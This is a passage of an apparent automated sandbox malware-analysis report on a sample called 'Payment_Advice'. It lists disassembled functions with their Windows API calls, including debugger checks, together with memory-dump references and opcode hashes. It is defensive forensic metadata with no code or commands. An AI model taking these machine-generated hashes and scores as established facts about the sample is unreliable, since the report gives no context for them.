                                                                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                    • String ID: CMT
                                                                                                    • API String ID: 1206968400-2756464174
                                                                                                    • Opcode ID: 23e95cbd4da3127327ec7bf0450f69e86a581e4a927e189c9e57c3b7f6c6361c
                                                                                                    • Instruction ID: d9adad85ee70d03c472073384454b0d520b8f109018b4b4049187dbc52bd678f
                                                                                                    • Opcode Fuzzy Hash: 23e95cbd4da3127327ec7bf0450f69e86a581e4a927e189c9e57c3b7f6c6361c
                                                                                                    • Instruction Fuzzy Hash: 576216716002468FDB19DF34C89A6EE3FA5BF55300F08457EEC9A8B2C2DB759985CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0051F844
                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0051F910
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051F930
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0051F93A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 254469556-0
                                                                                                    • Opcode ID: 075257bd73bbc52b9c3baed37e3b9236993d9374a1e4f4e66a3113d3814e8be0
                                                                                                    • Instruction ID: a62003851c8350f736864eb6ce10210199db5c1df94a36d851c8a67d8ed6add4
                                                                                                    • Opcode Fuzzy Hash: 075257bd73bbc52b9c3baed37e3b9236993d9374a1e4f4e66a3113d3814e8be0
                                                                                                    • Instruction Fuzzy Hash: 91312975D05219DBEB20DFA4D9897CCBBB8BF08304F1040AAE40DAB260EB759B85DF44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • VirtualQuery.KERNEL32(80000000,0051E5E8,0000001C,0051E7DD,00000000,?,?,?,?,?,?,?,0051E5E8,00000004,00561CEC,0051E86D), ref: 0051E6B4
                                                                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0051E5E8,00000004,00561CEC,0051E86D), ref: 0051E6CF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoQuerySystemVirtual
                                                                                                    • String ID: D
                                                                                                    • API String ID: 401686933-2746444292
                                                                                                    • Opcode ID: 2cdea38ac0e92bd10c6f7611970d5f783f2e70b04307fc3496761467941a2928
                                                                                                    • Instruction ID: 0a0e57774947cd7e3db9d79b6f5d08604cbaaf318f59c98359338afd53c2a8f1
                                                                                                    • Opcode Fuzzy Hash: 2cdea38ac0e92bd10c6f7611970d5f783f2e70b04307fc3496761467941a2928
                                                                                                    • Instruction Fuzzy Hash: 0E01D4326001096BEB14DE29DC09ADD7BAAFFC4324F0CC120ED19D7250D638D9458680
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00528EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00528FB5
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00528FBF
                                                                                                    • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00528FCC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: a6d7aa14c04d6814a75fdaf8ae41cfa84161e8acaf79f68548b3b40fee8469d8
                                                                                                    • Instruction ID: 3ab0b9ae9f4d250b1cd7b5426b0094fbaed8648e861deca0574e319f89e4ebed
                                                                                                    • Opcode Fuzzy Hash: a6d7aa14c04d6814a75fdaf8ae41cfa84161e8acaf79f68548b3b40fee8469d8
                                                                                                    • Instruction Fuzzy Hash: 9631D875901229ABCB21DF64DD897DCBBB8BF48310F5041EAE41CA7290EB749F858F44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052B348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .
                                                                                                    • API String ID: 0-248832578
                                                                                                    • Opcode ID: df5dae998718e51e7b7147ef8a6bf8b62890385756e1e7cc9370a4a2e3ba77d5
                                                                                                    • Instruction ID: 9002ca09c94ffde1709b96e439345171451ac64ad14027fb00b9847ae75b8b18
                                                                                                    • Opcode Fuzzy Hash: df5dae998718e51e7b7147ef8a6bf8b62890385756e1e7cc9370a4a2e3ba77d5
                                                                                                    • Instruction Fuzzy Hash: 8231F6719002596BEF24DE78DC84EFA7FBDEF86314F0445A8E81897292E7309E458B90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052D440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                    • Instruction ID: fdf8dc2e088e7cde87cc29cfc9e2a4b14520bee61df1bad5eb21b2927d5dfd56
                                                                                                    • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                    • Instruction Fuzzy Hash: 9A022B71E002299FDF14CFA9D8806ADBBF1FF89314F258269D919E7381D735AA41CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0051AF35
                                                                                                    • GetNumberFormatW.KERNEL32(00000400,00000000,?,0053E72C,?,?), ref: 0051AF84
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FormatInfoLocaleNumber
                                                                                                    • String ID:
                                                                                                    • API String ID: 2169056816-0
                                                                                                    • Opcode ID: 8c1328a342e582d9d2beecc5aa4f6dc311339d525991eded8dbe47f943e206ba
                                                                                                    • Instruction ID: 56aa94543c945d00f321252bf84003532c8970cc585574aadb96b656889f7bf0
                                                                                                    • Opcode Fuzzy Hash: 8c1328a342e582d9d2beecc5aa4f6dc311339d525991eded8dbe47f943e206ba
                                                                                                    • Instruction Fuzzy Hash: 3E017C3A200348AAD7109FA4EC46F9A7BFCFF18710F405032FA05E7290E370A959DBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00506C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00506DDF,00000000,00000400), ref: 00506C74
                                                                                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00506C95
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                    • String ID:
                                                                                                    • API String ID: 3479602957-0
                                                                                                    • Opcode ID: d9a55cb6e95a10977aed1bcb6d4b8359750dc040dbfecafb933b0efa5f3c5165
                                                                                                    • Instruction ID: 02b4801f58e1618a1ea60064fe7cef2e5311fe98f6c05c588857a16e2417bd9f
                                                                                                    • Opcode Fuzzy Hash: d9a55cb6e95a10977aed1bcb6d4b8359750dc040dbfecafb933b0efa5f3c5165
                                                                                                    • Instruction Fuzzy Hash: DDD0A934344300BFFB040B218D0AF2E3F98BF50B42F18C404B380E80E0DAB48828B628
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005319F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005319EF,?,?,00000008,?,?,0053168F,00000000), ref: 00531C21
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise
                                                                                                    • String ID:
                                                                                                    • API String ID: 3997070919-0
                                                                                                    • Opcode ID: 66ec65ee7f10955995d21279fa10120f206ccbf4cbdbbfc67a76d222ada70458
                                                                                                    • Instruction ID: 2d7573ca4061c3e52ce5f2055e19f11d2cb3c2c4c0edc3941bc951b463fd0fac
                                                                                                    • Opcode Fuzzy Hash: 66ec65ee7f10955995d21279fa10120f206ccbf4cbdbbfc67a76d222ada70458
                                                                                                    • Instruction Fuzzy Hash: 93B14A31210A089FD715CF28C49AB65BFE0FF45365F258658E89ACF2A1C735ED92CB44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0051F66A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 2325560087-0
                                                                                                    • Opcode ID: 2e978898042d992720a75b57fb336348bde19e4c3ad9b7aef0d4c00a14923d2f
                                                                                                    • Instruction ID: 231de9c3d1652dbd1a7587934448ead071ae86ab94df8b2256e262e98d958846
                                                                                                    • Opcode Fuzzy Hash: 2e978898042d992720a75b57fb336348bde19e4c3ad9b7aef0d4c00a14923d2f
                                                                                                    • Instruction Fuzzy Hash: 905180B19006199FEB24CF58E9867EEBBF4FB58354F24853AD411EB390D3749944CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0050B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0050B16B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Version
                                                                                                    • String ID:
                                                                                                    • API String ID: 1889659487-0
                                                                                                    • Opcode ID: 3b92c2ad8302f51a15b8bd13cce22db515b396fb29ad0fd6834c3450f8ce53c9
                                                                                                    • Instruction ID: 3382780d0a5856ff06861cc84ead4ad3b5ce7b81f74d008c8e5e96cb2d5e217e
                                                                                                    • Opcode Fuzzy Hash: 3b92c2ad8302f51a15b8bd13cce22db515b396fb29ad0fd6834c3450f8ce53c9
                                                                                                    • Instruction Fuzzy Hash: 76F03AB8E006088FDB28CB18ED9A6D977F1FBA9359F104295D51993390C3B0A9C8DF64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005040FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: gj
                                                                                                    • API String ID: 0-4203073231
                                                                                                    • Opcode ID: bcc56bf6068f5c2fd5f385ece35ef7d576f0538485a91f732819961c9dfd73b7
                                                                                                    • Instruction ID: 8ce939f313efb74e73aeb4c52d9c1b46a56fe94784fe1b47f342b412dc36ea50
                                                                                                    • Opcode Fuzzy Hash: bcc56bf6068f5c2fd5f385ece35ef7d576f0538485a91f732819961c9dfd73b7
                                                                                                    • Instruction Fuzzy Hash: BDC127B6A183418FC354CF2AD88065AFBE1BFC8308F19892DE998D7311D734E955CB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0051F3A5), ref: 0051F9DA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                    • String ID:
                                                                                                    • API String ID: 3192549508-0
                                                                                                    • Opcode ID: 7e545dac1ebb2faf2b48f8968936b0fd0ab60337a693bb58f6f369ca2c9f46f8
                                                                                                    • Instruction ID: bdc7777680aceb967434e2ba55de9dea00fe24684ecc62a35b5ef08402485eb4
                                                                                                    • Opcode Fuzzy Hash: 7e545dac1ebb2faf2b48f8968936b0fd0ab60337a693bb58f6f369ca2c9f46f8
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 54951025-0
                                                                                                    • Opcode ID: 359cc51e40981e80979e34cef1b31dddd9ae9795d8c0d6959930e7266df1215b
                                                                                                    • Instruction ID: 977f118b96727179866e7f842200ff29eb7b18019d9b3a2d2272e238bb36abc6
                                                                                                    • Opcode Fuzzy Hash: 359cc51e40981e80979e34cef1b31dddd9ae9795d8c0d6959930e7266df1215b
                                                                                                    • Instruction Fuzzy Hash: 22A011302022008BC3008F38AE082083AA8AA20282B08002AA008C2220EAA080A8FB00
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005162CA Relevance: .8, Instructions: 829COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                                                    • Instruction ID: 48fd3b5b738bcf3e0ff4af3b637819156058e4c42ce91aa3f7f62c0c6cc0e5d2
                                                                                                    • Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                                                                    • Instruction Fuzzy Hash: 0562DF716047859FDB25CF28C8906F9BFE1BF95304F08896DE8AA8B342D730E985CB11
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005177EF Relevance: .8, Instructions: 817COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
